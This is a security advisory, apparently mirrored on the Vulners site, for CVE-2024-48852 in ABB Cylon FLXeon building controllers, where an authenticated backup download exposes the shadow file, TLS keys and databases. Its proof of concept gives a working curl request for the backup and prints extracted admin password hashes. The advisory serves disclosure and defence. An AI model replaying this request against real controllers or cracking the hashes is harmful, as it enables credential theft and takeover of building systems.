Vulners
Lucene search
ABB Cylon FLXeon 9.3.4 Insecure Backup Sensitive Data Exposure
10
ABB Cylon FLXeon 9.3.4 Insecure Backup Sensitive Data Exposure
Vendor: ABB Ltd.
Product web page: https://www.global.abb
Affected version: FLXeon Series (FBXi Series, FBTi Series, FBVi Series)
CBX Series (FLX Series)
CBT Series
CBV Series
Firmware: <=9.3.4
Summary: BACnet® Smart Building Controllers. ABB's BACnet portfolio features a
series of BACnet® IP and BACnet MS/TP field controllers for ASPECT® and INTEGRA™
building management solutions. ABB BACnet controllers are designed for intelligent
control of HVAC equipment such as central plant, boilers, chillers, cooling towers,
heat pump systems, air handling units (constant volume, variable air volume, and
multi-zone), rooftop units, electrical systems such as lighting control, variable
frequency drives and metering.
The FLXeon Controller Series uses BACnet/IP standards to deliver unprecedented
connectivity and open integration for your building automation systems. It's scalable,
and modular, allowing you to control a diverse range of HVAC functions.
Desc: A vulnerability exists due to an insecure backup.tgz file that, when obtained,
contains sensitive system files, including main.db, SSL/TLS certificates and keys,
the system shadow file with hashed passwords, and the license key. Although authentication
is required to access the backup, an attacker with access could extract these files
to retrieve stored credentials, decrypt secure communications, and escalate privileges
by cracking password hashes. This exposure poses a significant security risk, potentially
leading to unauthorized access, data breaches, and full system compromise.
MSG: "Backups will perform a full backup to a file that is downloaded to you PC. This
includes strategy data, BACnet settings, and settings made through this web interface."
Tested on: Linux Kernel 5.4.27
Linux Kernel 4.15.13
NodeJS/8.4.0
Express
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2025-5924
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5924.php
CVE ID: CVE-2024-48852
CVE URL: https://www.cve.org/CVERecord?id=CVE-2024-48852
21.04.2024
--
$ cat project
P R O J E C T
.|
| |
|'| ._____
___ | | |. |' .---"|
_ .-' '-. | | .--'| || | _| |
.-'| _.| | || '-__ | | | || |
|' | |. | || | | | | || |
____| '-' ' "" '-' '-.' '` |____
░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░
░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░
$ curl -k https://7.3.3.1/api/backup \
> -o backup.tgz \
> -H "Cookie: user_sid=xxx" \
> -H "Content-type: application/json"
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 37705 100 37705 0 0 15947 0 0:00:02 0:00:02 --:--:-- 15949
$ tar -tf backup.tgz
etc/systemd/
etc/systemd/resolved.conf
etc/systemd/journald.conf
etc/systemd/user/
etc/systemd/timesyncd.conf
etc/systemd/system/
etc/systemd/system/dbus-org.freedesktop.resolve1.service
etc/systemd/system/basic.target.wants/
etc/systemd/system/nfsserver.service
etc/systemd/system/psplash.service
etc/systemd/system/default.target
etc/systemd/system/dbus-org.freedesktop.network1.service
etc/systemd/system/nodejs.service
etc/systemd/system/modutils.service
etc/systemd/system/supervisord.service
etc/systemd/system/syslog.service
etc/systemd/system/systemd-udevd.service
etc/systemd/system/sysinit.target.wants/
etc/systemd/system/sysinit.target.wants/run-postinsts.service
etc/systemd/system/local-fs.target.wants/
etc/systemd/system/local-fs.target.wants/var-volatile-spool.service
etc/systemd/system/local-fs.target.wants/var-volatile-cache.service
etc/systemd/system/local-fs.target.wants/var-volatile-lib.service
etc/systemd/system/local-fs.target.wants/var-volatile-srv.service
etc/systemd/system/systemd-random-seed.service.wants/
etc/systemd/system/systemd-random-seed.service.wants/var-volatile-lib.service
etc/systemd/system/getty.target.wants/
etc/systemd/system/getty.target.wants/[email protected]
etc/systemd/system/telnetd.service
etc/systemd/system/network-online.target.wants/
etc/systemd/system/network-online.target.wants/systemd-networkd-wait-online.service
etc/systemd/system/nfscommon.service
etc/systemd/system/bluetooth.target.wants/
etc/systemd/system/bluetooth.target.wants/bluetooth.service
etc/systemd/system/sync-clocks.service
etc/systemd/system/stunnel.service
etc/systemd/system/lighttpd.service
etc/systemd/system/ntpd.service
etc/systemd/system/thttpd.service
etc/systemd/system/sockets.target.wants/
etc/systemd/system/sockets.target.wants/rpcbind.socket
etc/systemd/system/sockets.target.wants/dropbear.socket
etc/systemd/system/sockets.target.wants/systemd-networkd.socket
etc/systemd/system/dbus-1.service
etc/systemd/system/systemd-hostnamed.service
etc/systemd/system/multi-user.target.wants/
etc/systemd/system/multi-user.target.wants/rngd.service
etc/systemd/system/multi-user.target.wants/nodejs.service
etc/systemd/system/multi-user.target.wants/systemd-resolved.service
etc/systemd/system/multi-user.target.wants/atd.service
etc/systemd/system/multi-user.target.wants/supervisord.service
etc/systemd/system/multi-user.target.wants/machines.target
etc/systemd/system/multi-user.target.wants/media-sda1.mount
etc/systemd/system/multi-user.target.wants/strongswan.service
etc/systemd/system/multi-user.target.wants/vsftpd.service
etc/systemd/system/multi-user.target.wants/crond.service
etc/systemd/system/multi-user.target.wants/lighttpd.service
etc/systemd/system/multi-user.target.wants/ntpd.service
etc/systemd/system/multi-user.target.wants/systemd-networkd.service
etc/systemd/system/multi-user.target.wants/ntpdate.service
etc/systemd/system/multi-user.target.wants/remote-fs.target
etc/systemd/system/multi-user.target.wants/hwclock.timer
etc/systemd/system/multi-user.target.wants/gplv3-notice.service
etc/systemd/system/dhcp-server.service
etc/systemd/system/dbus-org.bluez.service
etc/systemd/system/timers.target.wants/
etc/systemd/system/timers.target.wants/logrotate.timer
etc/systemd/system/networking.service
etc/systemd/coredump.conf
etc/systemd/logind.conf
etc/systemd/network/
etc/systemd/network/30-wlan.network
etc/systemd/network/10-eth.network
etc/systemd/network/60-usb.network
etc/systemd/user.conf
etc/systemd/system.conf
etc/passwd
etc/group
etc/shadow
etc/gshadow
etc/hostname
usr/local/aam/etc/com.properties
usr/local/aam/etc/bdt.txt
usr/local/aam/etc/bdt2.txt
usr/local/aam/etc/dynamic.db
usr/local/aam/etc/main-bkup.db
usr/local/aam/etc/main.db
usr/local/aam/etc/priArray.db
usr/local/aam/etc/license.txt
etc/localtime
home/MIX_CMIX/node-server/certs/
home/MIX_CMIX/node-server/certs/cbxi.cert.pem
home/MIX_CMIX/node-server/certs/cbxi.key.pem
home/MIX_CMIX/node-server/certs/intermediate.cert.pem
home/MIX_CMIX/node-server/certs/kennesaw-ca.crt
usr/local/aam/fud/
usr/local/aam/fud/store/
$ tar -xf backup.tgz -C backup_extracted
$ tail -n 2 backup_extracted/etc/shadow
admin:$6$CYDLiwrd/dJ6GBxa$FZxr6hz56.FkEDlz2No/lZiEwX/ArpBbf/jIuLOKpPLDRy02ur0pXsVVCYdR8HmKOudNEtlNGpRh4Nkgk.s3S/:17901:0:99999:7:::
cxpro:$6$tJ.mhJzEwaMWh01A$7ureB0a6.mcxhLGLwyRUeOhykLPf/FOXqWT.729Q/rjIamCGFUsxuptdrvX7GdEAy3ayzhzD8e14M.ftzyXGn0:17901:0:99999:7:::Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
14 Feb 2025 00:00Current
7High risk
Vulners AI Score7
CVSS 3.19.4
CVSS 46.9
EPSS0.02585